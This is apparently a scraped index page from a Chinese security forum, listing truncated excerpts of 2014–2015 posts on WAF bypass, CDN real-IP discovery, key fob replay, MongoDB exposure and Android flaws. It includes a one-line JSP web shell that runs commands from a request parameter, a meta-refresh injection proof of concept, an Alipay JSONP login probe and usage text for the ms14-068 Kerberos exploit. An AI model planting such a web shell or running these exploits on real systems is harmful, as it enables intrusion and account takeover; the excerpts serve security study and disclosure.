如何快速的判断一个二级域名是否存在三级域名 xsser (十根阳具有长短!!) | 2015-01-13 18:32 要求快准狠，最好是秒级，有啥思路么? RT [原文地址] 各种吐槽： 1# xsjswt | 2015-01-13

简单获取CDN背后网站的真实IP fate0 | 2015-01-15 20:17 事先声明: 方法可能存在漏报(嗯, 在人品差的情况下) 唔, 我们使用 www.wooyun.org 作为案例。 首先从 www.wooyun.org 服务多次挂的页面可

Windows Telnet 服务中的漏洞可能允许远程执行代码 (3020393) 微软发布了一个重要的安全补丁： 此安全更新可解决 Microsoft Windows 中一个私下报告的漏洞。 如果攻击者向受影响的 Windows Server 发送特

视频: 安卓邮件客户端漏洞测试 FD 论坛上刚爆出的一个漏洞 poc: <meta http-equiv="refresh" content="0;URL='http://www.maliciousurl.com'" /> 攻击者可以构造一个邮件发给目标并且重定向到固定页面 详情可以 点击 Full Disclosure: Good for Enterprise Android HTML Injection

想了很久，标题还是水一点算了[密码学相关] xsjswt | 2015-01-08 10:00 《应用密码学 -算法、协议与C源码》是一本很好的密码学协议入门、科普书 作者并没有一开始就介绍

[翻译]Python开发中的密码散列(Hashing) 杀戮 (乌云安全实验室的杂役) | 2015-01-04 23:17 去年7月的一篇小文，看着还不错，就翻译了，当然还是我

bypass姿势汇总 MayIKissYou | 2015-01-04 17:16 最近做web测试的时候也翻阅了不少资料，各种姿势下的bypass，自己看到的和分析的总结一下，分享给小伙伴们。 1

为什么会有免费代理？ 五道口杀气 | 2015-01-04 12:14 因为这是一个很简单就可以收集用户数据的方法。 所有的工作都是可以通过修改SQUID配置达到。 1.[Server] 在linux

Hash在安全方面的应用 杀戮 (乌云安全实验室的杂役) | 2014-12-23 18:13 0x00 Hash简介与背景 这篇主要是最近准备做的一个研究的笔记， 还有几篇都是事前准备用的

wifi环境下获取对方手机号码的可能性 xsser (十根阳具有长短!!) | 2014-12-30 14:49 最近有人问到这个，我也比较好奇，大家觉得有可能么？ [原文地址] 各种吐槽：

JSON应用：判断支付宝是否登录 专注XSS三十年 | 2014-12-31 03:16 通过JSON判断登录状态 https://lab.alipay.com/user/msgcenter/getMsgInfosNew.json?_callback=xss&_input_charset=utf-8&ctoken=222&_=1419965709755 已登录： zozi({"popMsg":false,"infos":[],"totalCount":6,"stat":"ok","isRead":false}) 未登录： zozi({"target":"https://auth.alipay.com/login/index.htm?goto=","stat":"deny"}) 支付宝里有很多类似的JSON，虽然请求里

Hack无线门铃 - 简单分析和重放攻击 mramydnei | 2014-12-23 20:04 自上次借朋友的汽车测试了下重放攻击（【视频】黑客远程入侵汽车解锁车门，汽车电子钥匙信号重放，重放

Mongodb未授权访问 园长 (但愿你是狗,牵你一起走。@z7y @小胖子 噢，最怕你是狗喔，我最怕你不走。@saline @Anonymous 从前 @z7y 有个表弟 @VIP 后来死

一：执行系统命令: 无回显执行系统命令： <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求：http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执

虚拟机安全 02 检测 01 杀戮 (乌云安全实验室的杂役) | 2014-12-17 14:05 大家好，我又来挖坑了，虚拟机的检测技术解决的问题是”你如何知道你是不是在虚拟机里”。 这篇

嵌入式设备中的盲注 (翻译) 杀戮 (乌云安全实验室的杂役) | 2014-12-17 16:14 作者展示的情况是当你能输入命令但是看不到回显的情况下如何确认这是个漏洞，并利用。

bypass 最新安全狗 MayIKissYou | 2014-12-16 17:16 最近在做特征的时候发现IPS的检测中往往会有一个最大检测长度，譬如IPS最大检测长度可能于数据包的个数或则数据流的长度有

【HELP】Thinkphp识别/指纹/搜集 phith0n (我也不会难过 你不要小看我) | 2014-12-19 01:03 近来创业虽然辛苦，但在写创业项目代码的时候还能发现几个0da

前言： 最近入门开始玩android的安全，但是国内研究的真的很少，国外有本牛逼的书《Android Hacker's Handbook》，写的不错，但是看着睡

最近想想貌似很多坑没填的样子，赶紧出来填个坑...... 现在我们需要加入一些有用的东西，以前说的贝叶斯公式看着很强大，但是好像用处不是很大的

Putty的噩梦——渗透工具PuttyRider使用心得分享 我们在入侵到一台主机的时候，经常会看到管理员的桌面会放着putty.exe，这说

SandBox系列 01 Windows沙盒通用框架 杀戮 (某无业游民) | 2014-12-09 10:31 0x00 背景 跟瞌睡龙商量后决定把这个系列重新开始写，尽量通俗易懂，第一篇只对

ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : Domain Users (513) Domain Admins (512) Schema Admins (518) Enterprise Admins (519) Group Policy Creator Owners (520) USAGE: ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> OPTIONS: -p <clearPassword> --rc4 <ntlmHash> Example usage : Linux (tested with

出问题的地方是在上传简历那里，可以上传任意后缀，上传一个a.php文件，很正常没有执行php，也没有得到文件路径，但是文件的内容以base6

视频: replay key fobs signal with hackrf for fun 先要在一个封闭的环境下捕获钥匙发射的.在使用gnuradio-companion搭建AM解调，然后输出到WX GUI Scope Sink 但是

iSniff GPS passively sniffs for SSID probes, ARPs and MDNS (Bonjour) packets broadcast by nearby iPhones, iPads and other wireless devices. The aim is to collect data which can be used to identify each device and determine previous geographical locations, based solely on information each device discloses about previously joined WiFi networks. iOS devices transmit ARPs which sometimes contain MAC addresses (BSSIDs) of previously joined WiFi networks, as described in

CVE-2014-8610 Android < 5.0 短信重发漏洞 瘦蛟舞 (科普是一种公益行为) | 2014-11-26 16:01 ###影响版本： android<5.0 ###ID CVE-2014-8610 Android id 17671795 ###危害 重发短信恶意扣费 通过伪造草稿箱短信，可以达到无权

测试使用Windows XP SP3，VMware Workstation 10.0.3。 经测试，如果360安全卫士（其实不止360一家）安装在非系统盘(360自身默认安

贝叶斯安全应用 (2) 信息提取 杀戮 (某无业游民) | 2014-11-25 17:18 昨天说了下公式的原理，结果忘了提IBM paper的事，其实里面的细节也没怎么看，我就看到一张

贝叶斯安全应用 (1) 杀戮 (某无业游民) | 2014-11-24 18:12 之前在微博上看到一个妹纸分享了一个IBM的paper，关于通过贝叶斯推导数据泄露，很有趣，当然算法本